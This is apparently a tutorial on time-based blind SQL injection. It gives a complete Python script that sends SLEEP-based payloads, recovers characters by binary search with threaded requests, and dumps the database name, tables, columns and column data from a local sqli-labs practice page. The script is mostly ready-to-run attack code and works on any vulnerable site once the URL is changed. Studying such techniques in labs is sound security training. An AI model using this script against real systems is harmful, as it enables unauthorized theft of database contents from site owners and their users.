Time-based blind SQL injection is an SQL injection technique in which the attacker infers information stored in the database by observing differences in the server's response time. The functions and steps below are the ones commonly used in time-based blind injection to recover table names, column names, and the data itself.
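As a minimal sketch of the idea (using the same sqli-labs Less-8 endpoint as the full script below), a single request answers one yes/no question about the data: if the injected condition holds, the response is delayed by `SLEEP(2)`; otherwise it returns quickly.

```python
import time

import requests

# One boolean question: is the ASCII code of the first character of the
# current database name >= 97 (i.e., a lowercase letter)?
url = "http://127.0.0.1/sqlilabs/Less-8/index.php"
payload = "1' AND IF(ASCII(SUBSTRING((SELECT database()),1,1)) >= 97, SLEEP(2), 0) -- "

start = time.time()
requests.get(url, params={"id": payload})
elapsed = time.time() - start

# A delay well above the normal round-trip time means the condition was true.
print("condition true" if elapsed > 1.5 else "condition false")
```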
Rather than asking one such question per candidate value, the script below narrows each character down with binary search:
```python
import concurrent.futures
import time

import requests


def binary_search_character(url, query, index, low=32, high=128):
    """Recover the character at position `index` of `query`'s result via the timing oracle."""
    while low < high:
        mid = (low + high + 1) // 2
        # If the character's ASCII code is >= mid, the server sleeps for 2 seconds.
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        start_time = time.time()
        requests.get(url, params={"id": payload})
        response_time = time.time() - start_time
        if response_time > 1.5:   # SLEEP fired: the code is at least mid
            low = mid
        else:                     # no delay: the code is below mid
            high = mid - 1
    # low == high is the character's ASCII code; 32 means no character at this position.
    return chr(low) if low > 32 else ''
```
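To sanity-check the bisection loop without touching a target, the same logic can be run against a pure-Python oracle that answers the same "is the character's code >= mid?" question the timing side channel answers. This is only an illustrative check, not part of the attack script:

```python
def _bisect_with_oracle(is_ge, low=32, high=128):
    """Same loop as binary_search_character, with `is_ge(mid)` standing in for the timing check."""
    while low < high:
        mid = (low + high + 1) // 2
        if is_ge(mid):
            low = mid
        else:
            high = mid - 1
    return chr(low)

assert _bisect_with_oracle(lambda m: ord('s') >= m) == 's'
assert _bisect_with_oracle(lambda m: ord('A') >= m) == 'A'
```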
How time-based blind injection works

- `SLEEP(2)`: if the injected condition is true, the server delays its response by 2 seconds.
- The response time of each request is measured with `time.time()`; a response slower than the 1.5-second threshold means `SLEEP()` fired (see the calibration sketch below).
- Each character is recovered with binary search, which cuts the number of requests per character and speeds up extraction.
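The 1.5-second cutoff only works if normal responses are much faster than `SLEEP(2)`, so it is worth measuring the baseline latency first. A minimal sketch (a benign request to the same endpoint; the `baseline_latency` helper is not part of the original script):

```python
import statistics
import time

import requests

def baseline_latency(url, samples=5):
    """Median round-trip time of a few benign requests, for choosing the SLEEP threshold."""
    timings = []
    for _ in range(samples):
        start = time.time()
        requests.get(url, params={"id": "1"})
        timings.append(time.time() - start)
    return statistics.median(timings)

# If the median baseline is around 0.1 s, a 1.5 s cutoff cleanly separates
# SLEEP(2) responses from normal ones.
```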
To speed up extraction, `extract_data` recovers all character positions in parallel with a thread pool:

```python
def extract_data(url, query, max_length=200):
    """Extract up to max_length characters of `query`'s result, one thread per position."""
    extracted_data = [''] * max_length
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        # Submit one binary search per character position (positions are 1-based in SQL).
        future_to_index = {
            executor.submit(binary_search_character, url, query, i): i
            for i in range(1, max_length + 1)
        }
        for future in concurrent.futures.as_completed(future_to_index):
            index = future_to_index[future]
            try:
                result = future.result()
                if result:
                    extracted_data[index - 1] = result
                    # Show intermediate progress as characters arrive (out of order).
                    print(f"Progress: {''.join(extracted_data).strip()}")
            except Exception as exc:
                print(f"Error extracting character {index}: {exc}")
    return ''.join(extracted_data).strip()
```
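Two practical notes. Firing ten timing requests in parallel can skew the measured delays if the target serializes requests, so lowering `max_workers` is a simple mitigation. Also, instead of always scanning a fixed `max_length` of 200 positions, the result length can be probed first with the same timing oracle; a hedged sketch (the `guess_length` helper is not part of the original script):

```python
def guess_length(url, query, max_length=200):
    """Bisect LENGTH((query)) with the same timing oracle to avoid probing empty positions."""
    low, high = 0, max_length
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(LENGTH(({query})) >= {mid}, SLEEP(2), 0) -- "
        start_time = time.time()
        requests.get(url, params={"id": payload})
        if time.time() - start_time > 1.5:
            low = mid
        else:
            high = mid - 1
    return low  # the result's length, assuming it does not exceed max_length
```

The returned length can then be passed to `extract_data` as `max_length`.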
Putting it together, the main block walks from the database name to table names, column names, and finally the data:

```python
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'

    # 1. Current database name
    database_name = extract_data(url, "SELECT database()")
    print(f"Database name: {database_name}")

    # 2. Table names in that database
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"Table names: {table_names}")

    # 3. Column names of the first table
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"Column names: {column_names}")

    # 4. Data from the second column (adjust the index for the column you want)
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"Data: {extracted_values}")
```